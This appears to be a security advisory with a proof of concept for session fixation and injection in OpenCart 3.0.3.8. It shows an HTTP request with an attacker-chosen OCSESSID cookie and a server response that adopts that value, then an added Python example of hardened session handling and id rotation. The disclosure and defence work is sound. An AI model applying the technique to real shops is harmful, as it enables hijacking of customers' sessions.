## https://sploitus.com/exploit?id=PACKETSTORM:165090
# Exploit Title: OpenCart 3.0.3.8 - Session Injection  
# Date: 28/11/2021  
# Exploit Author: Hubert Wojciechowski  
# Contact Author: snup.php@gmail.com  
# Company: https://redteam.pl  
# Vendor Homepage: https://www.opencart.com/  
# Software Link: https://www.opencart.com/  
# Version: 3.0.3.8  
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
  
### Session Fixation / Injection  
  
The session cookie "OCSESSID" is improperly processed.  
An attacker can set the cookie to any value and the server adopts that value as the session identifier, echoing it back in its own Set-Cookie header.  
Because of that, the application is vulnerable to session injection and session fixation.  
  
-----------------------------------------------------------------------------------------------------------------------  
# POC  
-----------------------------------------------------------------------------------------------------------------------  
  
## Example  
  
Modify cookie "OCSESSID" value:  
-----------------------------------------------------------------------------------------------------------------------  
Request:  
-----------------------------------------------------------------------------------------------------------------------  
  
GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Referer: http://127.0.0.1/opencart-3.0.3.8/  
Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
-----------------------------------------------------------------------------------------------------------------------  
The server sets the attacker-supplied value:  
  
Response:  
-----------------------------------------------------------------------------------------------------------------------  
  
HTTP/1.1 200 OK  
Date: Sun, 28 Nov 2021 15:16:06 GMT  
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11  
X-Powered-By: PHP/8.0.11  
Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/  
Connection: close  
Content-Type: text/html; charset=utf-8  
Content-Length: 18944  
[...]
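The exchange above shows the server adopting whatever the client sends as OCSESSID. The following added example (not OpenCart's code; the id format, the in-memory store and the function names are assumptions for illustration) contrasts that behaviour with a hardened session start that only accepts ids the server itself issued, plus id rotation at login, which is the standard defence against fixation:

```python
import re
import secrets

# Format of ids this server issues: 32 lowercase hex chars (a constructed
# policy for the example, not OpenCart's own id format).
SESSION_ID_RE = re.compile(r"^[a-f0-9]{32}$")


class SessionStore:
    """In-memory stand-in for the server-side session backend."""

    def __init__(self):
        self.sessions = {}  # session_id -> session data

    def create(self, data=None):
        sid = secrets.token_hex(16)  # 32 hex chars from a CSPRNG
        self.sessions[sid] = dict(data or {})
        return sid

    def exists(self, sid):
        return sid in self.sessions


def start_session_vulnerable(store, cookie_value):
    """The behaviour shown in the advisory: whatever the client sends as
    OCSESSID becomes the session id and is echoed back in Set-Cookie."""
    sid = cookie_value or store.create()
    store.sessions.setdefault(sid, {})
    return sid


def start_session_hardened(store, cookie_value):
    """Adopt a client-supplied id only if it is well-formed AND already
    known to the server; anything else gets a fresh server-generated id."""
    if cookie_value and SESSION_ID_RE.match(cookie_value) and store.exists(cookie_value):
        return cookie_value
    return store.create()


def regenerate_session(store, old_sid):
    """Rotate the id at privilege changes (e.g. login) so that an id planted
    before authentication is never the one that ends up authenticated."""
    data = store.sessions.pop(old_sid, {})
    return store.create(data)
```

Running the advisory's cookie value ("zxcvzxcvzxcvzxcvzxcvzxcv") through both functions shows the vulnerable path returning it unchanged and the hardened path discarding it for a server-generated id.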